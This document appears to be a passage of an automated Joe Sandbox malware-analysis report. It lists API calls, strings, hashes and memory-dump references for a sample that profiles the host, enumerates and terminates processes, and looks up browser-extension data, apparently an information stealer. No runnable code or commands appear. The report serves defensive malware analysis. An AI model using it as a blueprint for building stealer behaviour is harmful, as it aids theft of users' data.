                                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                            • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                            • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                            • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                          • SetEnvironmentVariableA.KERNEL32(00792DE0,00000000,00000000,?,004212D8,?,00410153,0064B390,00420AFE), ref: 0040A132
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                          • String ID: -y
                                          • API String ID: 2929475105-3988916203
                                          • Opcode ID: 1dc6ff5021299d9550873c4f7eaef05b9e07b560f3695bfeac6a120b66fe4e78
                                          • Instruction ID: 8fd865f7776555e91364b6e3317f0d6dd22ba45ac697d56d5a10bd23e480980a
                                          • Opcode Fuzzy Hash: 1dc6ff5021299d9550873c4f7eaef05b9e07b560f3695bfeac6a120b66fe4e78
                                          • Instruction Fuzzy Hash: F9418DB9941204BFCB04EFE5ED45BEA33B6BB0A305F05112EF405A32A0DB385985CB67
                                          APIs
                                          • VirtualProtect.KERNEL32(?,?,@Jn@,@Jn@), ref: 00406C9F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID: @Jn@$Jn@$Jn@
                                          • API String ID: 544645111-1180188686
                                          • Opcode ID: caf630da144662436c325b164354e3ce96217d6286d52214ffa948e93cb1361e
                                          • Instruction ID: b746c2a28f05bbd6b1460d210bf7098c9bc173f160aa6dfc6dfdc57a011f18e7
                                          • Opcode Fuzzy Hash: caf630da144662436c325b164354e3ce96217d6286d52214ffa948e93cb1361e
                                          • Instruction Fuzzy Hash: FA213374E04208EFEB04CF84C544BAEBBB5FF48304F1181AAD54AAB381D3399A91DF85
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E28,00000000,?), ref: 022D8A96
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 022D8A9D
                                          • wsprintfA.USER32 ref: 022D8AB7
                                            • Part of subcall function 022DA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022DA9EF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateProcesslstrcpywsprintf
                                          • String ID: /y
                                          • API String ID: 1695172769-4241059335
                                          • Opcode ID: 124e357ede7c9a4ec2e38b5c0962ba134007384ad5c1c3eeb759acb43c381339
                                          • Instruction ID: 3e3b155a863220bc6ad6d47005a1aade4b43e15a6964d8ca76970e930c8fb7df
                                          • Opcode Fuzzy Hash: 124e357ede7c9a4ec2e38b5c0962ba134007384ad5c1c3eeb759acb43c381339
                                          • Instruction Fuzzy Hash: EE2142B5A84204BFDB10DFD4DD45FAEBBB9FB49701F104119F605A7680C779A900CB65
                                          APIs
                                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                          • GetSystemTime.KERNEL32(?,00794A78,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: SystemTimelstrcpy
                                          • String ID: cI@$cI@$xJy
                                          • API String ID: 62757014-4290197527
                                          • Opcode ID: 270aac1f6b61675edb1843e8a635b5515c73b826a4035c958f1de1623f3f8d38
                                          • Instruction ID: 15f3dfc6f8d56a301bf8b2a7a9260479b6db203ca669f730be279af5ebf73ee3
                                          • Opcode Fuzzy Hash: 270aac1f6b61675edb1843e8a635b5515c73b826a4035c958f1de1623f3f8d38
                                          • Instruction Fuzzy Hash: 7111E971D00008AFCB04EFA9C8919EE77B9EF58314F04C05EF01667241DF38AA86CBA6
                                          APIs
                                            • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                          • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 0041508A
                                          • lstrcatA.KERNEL32(?,00799A30), ref: 004150A8
                                            • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                            • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$FileFindFirstFolderPathwsprintf
                                          • String ID: P1y$aA
                                          • API String ID: 2699682494-1742707842
                                          • Opcode ID: 7d8f81950f29c353dc6eca79efceced1e8debec432d06c8626770cf998b7186f
                                          • Instruction ID: 27646669aa04729862e240b26620d37997e147c17b59a732ce93ef494e7ce50b
                                          • Opcode Fuzzy Hash: 7d8f81950f29c353dc6eca79efceced1e8debec432d06c8626770cf998b7186f
                                          • Instruction Fuzzy Hash: B801D6BAA4020877C714FBB0DC42EEE333CAB55304F00415DB68A570D1EE789AC88BA6
                                          APIs
                                          • lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                          • lstrcatA.KERNEL32(00000000), ref: 0041A982
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcatlstrcpy
                                          • String ID: vI@$vI@
                                          • API String ID: 3905823039-1245421781
                                          • Opcode ID: fdbee14e0802cf6b2965d2f6b2dd0298cd0a1d0021e9d1410a9323d4b8571ec6
                                          • Instruction ID: 271a46469eabd2290b2e3c410fce444a88fb87627d9bf606efbbe474ae7d75ee
                                          • Opcode Fuzzy Hash: fdbee14e0802cf6b2965d2f6b2dd0298cd0a1d0021e9d1410a9323d4b8571ec6
                                          • Instruction Fuzzy Hash: F011E878901108EFCB05EF94D885AEEB3B5FF49314F108599E825AB391C734AE92CF95
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 022D7B77
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 022D7B7E
                                          • GetComputerNameA.KERNEL32(?,00000104), ref: 022D7B96
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateComputerNameProcess
                                          • String ID: p/y
                                          • API String ID: 1664310425-2423603383
                                          • Opcode ID: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
                                          • Instruction ID: 3cca0151a59d8e7222f228c218024613a5fe8c4bc2e95e48b8e02edabaa7e7f8
                                          • Opcode Fuzzy Hash: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
                                          • Instruction Fuzzy Hash: 950181B1A54209EFD700DFD9DD45BAAFBB8FB45711F10421AFA05E3284C3B859008BA1
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,022C141E), ref: 022D7AE7
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 022D7AEE
                                          • GetUserNameA.ADVAPI32(00000104,00000104), ref: 022D7B06
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateNameProcessUser
                                          • String ID: @.y
                                          • API String ID: 1296208442-2902824038
                                          • Opcode ID: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
                                          • Instruction ID: 8ceb08547c78bb48cfc896b6f4aee824bc07bf86c6ae40a3d1ac48dffe6a80a6
                                          • Opcode Fuzzy Hash: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
                                          • Instruction Fuzzy Hash: BFF04FB5944208BFC710DFD8DD45BAEFBB8EB05711F10025AFA05A2680D77815048BA1
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0041951E,00000000), ref: 00418D5B
                                          • HeapAlloc.KERNEL32(00000000,?,?,0041951E,00000000), ref: 00418D62
                                          • wsprintfW.USER32 ref: 00418D78
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocProcesswsprintf
                                          • String ID: %hs
                                          • API String ID: 659108358-2783943728
                                          • Opcode ID: 308207b7b7d6c7c9756ec14eecfab78ddd1d2e288a316a00ead5d509718cb0e2
                                          • Instruction ID: e0c39cc4b97fe4de81499882959c588a1d03a161ade5b5bfa375175f6a3fb920
                                          • Opcode Fuzzy Hash: 308207b7b7d6c7c9756ec14eecfab78ddd1d2e288a316a00ead5d509718cb0e2
                                          • Instruction Fuzzy Hash: 96E08CB8A80208BFC710DBD4EC0AE697BB8EB05702F000194FE0A87280DA719E008B96
                                          APIs
                                            • Part of subcall function 022DA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022DA9EF
                                            • Part of subcall function 022DAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022DAC2C
                                            • Part of subcall function 022DAC17: lstrcpy.KERNEL32(00000000), ref: 022DAC6B
                                            • Part of subcall function 022DAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022DAC79
                                            • Part of subcall function 022DAB87: lstrcpy.KERNEL32(00000000,?), ref: 022DABD9
                                            • Part of subcall function 022DAB87: lstrcat.KERNEL32(00000000), ref: 022DABE9
                                            • Part of subcall function 022DAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022DAB6C
                                          • lstrlen.KERNEL32(00000000), ref: 022CB695
                                          • lstrlen.KERNEL32(00000000), ref: 022CB6A9
                                            • Part of subcall function 022DAA07: lstrcpy.KERNEL32(?,00000000), ref: 022DAA4D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$lstrlen$lstrcat
                                          • String ID: P/y$.y
                                          • API String ID: 2500673778-1359828175
                                          • Opcode ID: 8798f729b816a9cda623a426d452656803b252c12be97f132bf9029b60d48b94
                                          • Instruction ID: 68b9abbe45b9b9ed57a9ed6d72eee334373ecb8aead6c23b74ad5244b4175f69
                                          • Opcode Fuzzy Hash: 8798f729b816a9cda623a426d452656803b252c12be97f132bf9029b60d48b94
                                          • Instruction Fuzzy Hash: 41712E71A20358ABCB08EBE4DD95DEE733AAF24304F54462DE506A7198EF346A48CF51
                                          APIs
                                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                            • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                            • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                            • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                            • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                          • lstrlenA.KERNEL32(00000000), ref: 0040B42E
                                          • lstrlenA.KERNEL32(00000000), ref: 0040B442
                                            • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$lstrlen$lstrcat
                                          • String ID: P/y$.y
                                          • API String ID: 2500673778-1359828175
                                          • Opcode ID: 6fec028277900b40f27c2850ec3b0e8779d03b32c09c9e22800fcc27bbda89c2
                                          • Instruction ID: fa4c7b04dc1bb1edeb240a941fc638acc8c20e4742db631e424c44125528f59d
                                          • Opcode Fuzzy Hash: 6fec028277900b40f27c2850ec3b0e8779d03b32c09c9e22800fcc27bbda89c2
                                          • Instruction Fuzzy Hash: 68716271911108ABDB04FBA1DD92DEE7339BF14314F40452EF506A7091EF386A99CBAA
                                          APIs
                                            • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                            • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                            • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                            • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                            • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                            • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                            • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                            • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                            • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                            • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                            • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                            • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                          • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00421580,00420D92), ref: 0040F54C
                                          • lstrlenA.KERNEL32(00000000), ref: 0040F56B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                          • String ID: ^userContextId=4294967295$moz-extension+++
                                          • API String ID: 998311485-3310892237
                                          • Opcode ID: 332d76602d9979ba15099d14f0ed3dabde39ec0bd50ccc42a35f2ccae80d985e
                                          • Instruction ID: 431312e06e4e118a9a68feb07ac8eaa96768a2afdec7ba1937323e72019175af
                                          • Opcode Fuzzy Hash: 332d76602d9979ba15099d14f0ed3dabde39ec0bd50ccc42a35f2ccae80d985e
                                          • Instruction Fuzzy Hash: 19516575D11108AACB04FBB1DC52DED7338AF54314F40852EF81667191EE386B9ACBAA
                                          APIs
                                          • memset.MSVCRT ref: 022D9752
                                            • Part of subcall function 022D8FB7: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,022D9785,00000000), ref: 022D8FC2
                                            • Part of subcall function 022D8FB7: RtlAllocateHeap.NTDLL(00000000), ref: 022D8FC9
                                            • Part of subcall function 022D8FB7: wsprintfW.USER32 ref: 022D8FDF
                                          • OpenProcess.KERNEL32(00001001,00000000,?), ref: 022D9812
                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 022D9830
                                          • CloseHandle.KERNEL32(00000000), ref: 022D983D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                          • String ID:
                                          • API String ID: 3729781310-0
                                          • Opcode ID: 0de5cb3b84569db27d3217fbf1ad12f67d16f90c4b13aa02d8c22dae1f7b6e71
                                          • Instruction ID: c88ca1e9d61d54e1397a233f5e5906f4bf7a5666fc66138ff2ed679a6b7fec01
                                          • Opcode Fuzzy Hash: 0de5cb3b84569db27d3217fbf1ad12f67d16f90c4b13aa02d8c22dae1f7b6e71
                                          • Instruction Fuzzy Hash: 483128B5E50248AFDB14DFE0CC48BEDB77AEB45700F504459F506AA188DB786A84CF51
                                          APIs
                                          • memset.MSVCRT ref: 004194EB
                                            • Part of subcall function 00418D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0041951E,00000000), ref: 00418D5B
                                            • Part of subcall function 00418D50: HeapAlloc.KERNEL32(00000000,?,?,0041951E,00000000), ref: 00418D62
                                            • Part of subcall function 00418D50: wsprintfW.USER32 ref: 00418D78
                                          • OpenProcess.KERNEL32(00001001,00000000,?), ref: 004195AB
                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 004195C9
                                          • CloseHandle.KERNEL32(00000000), ref: 004195D6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
                                          • String ID:
                                          • API String ID: 396451647-0
                                          • Opcode ID: ee457ade85a58c401a034cc046952df660dfe0af018f09e7080f0d4154ab9e94
                                          • Instruction ID: faa3cbc47edc6d62fcde4c42a86d6f60d7c6cb9d9231cedff5acf80003c00c5b
                                          • Opcode Fuzzy Hash: ee457ade85a58c401a034cc046952df660dfe0af018f09e7080f0d4154ab9e94
                                          • Instruction Fuzzy Hash: E3315C75E4020CAFDB14DFD0CD49BEDB7B9EB44300F10441AE506AA284DB78AE89CB56
                                          APIs
                                            • Part of subcall function 022DA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022DA9EF
                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205B7), ref: 022D8931
                                          • Process32First.KERNEL32(?,00000128), ref: 022D8945
                                          • Process32Next.KERNEL32(?,00000128), ref: 022D895A
                                            • Part of subcall function 022DAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022DAC2C
                                            • Part of subcall function 022DAC17: lstrcpy.KERNEL32(00000000), ref: 022DAC6B
                                            • Part of subcall function 022DAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022DAC79
                                            • Part of subcall function 022DAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022DAB6C
                                          • CloseHandle.KERNEL32(?), ref: 022D89C8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                          • String ID:
                                          • API String ID: 1066202413-0
                                          • Opcode ID: 8b5492bb2172847200a0110b71b51f63116bc16bb71ede11aa5be0a2ca02365c
                                          • Instruction ID: 23e7ee89ca44a808d7911a27a0f8c0a4bd5ff6afbdbffa62ede4f32c2fd9346e
                                          • Opcode Fuzzy Hash: 8b5492bb2172847200a0110b71b51f63116bc16bb71ede11aa5be0a2ca02365c
                                          • Instruction Fuzzy Hash: DE316D71A11218ABCB24DF94DD45FEEB779EB55700F104199E10AA22A4DB346E84CF91
                                          APIs
                                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205B7), ref: 004186CA
                                          • Process32First.KERNEL32(?,00000128), ref: 004186DE
                                          • Process32Next.KERNEL32(?,00000128), ref: 004186F3
                                            • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                            • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                          • CloseHandle.KERNEL32(?), ref: 00418761
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                          • String ID:
                                          • API String ID: 1066202413-0
                                          • Opcode ID: 78e734e6add8f3848c475328f99532914076784f23aa1f873a6d1c9a0ebdb1a4
                                          • Instruction ID: 8f5abf7c5654a811b9b3f094c7d3948ba22bca0c3321aba4e2188e2e86b1b5ea
                                          • Opcode Fuzzy Hash: 78e734e6add8f3848c475328f99532914076784f23aa1f873a6d1c9a0ebdb1a4
                                          • Instruction Fuzzy Hash: F7315E71902218ABCB24EF95DC45FEEB778EF45714F10419EF10AA21A0DF386A85CFA5
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcessstrtok_s
                                          • String ID:
                                          • API String ID: 3407564107-0
                                          • Opcode ID: 23663e118dc1d9675e857bc575fa0cf4eec126624f33d54e6aec62cd9d365414
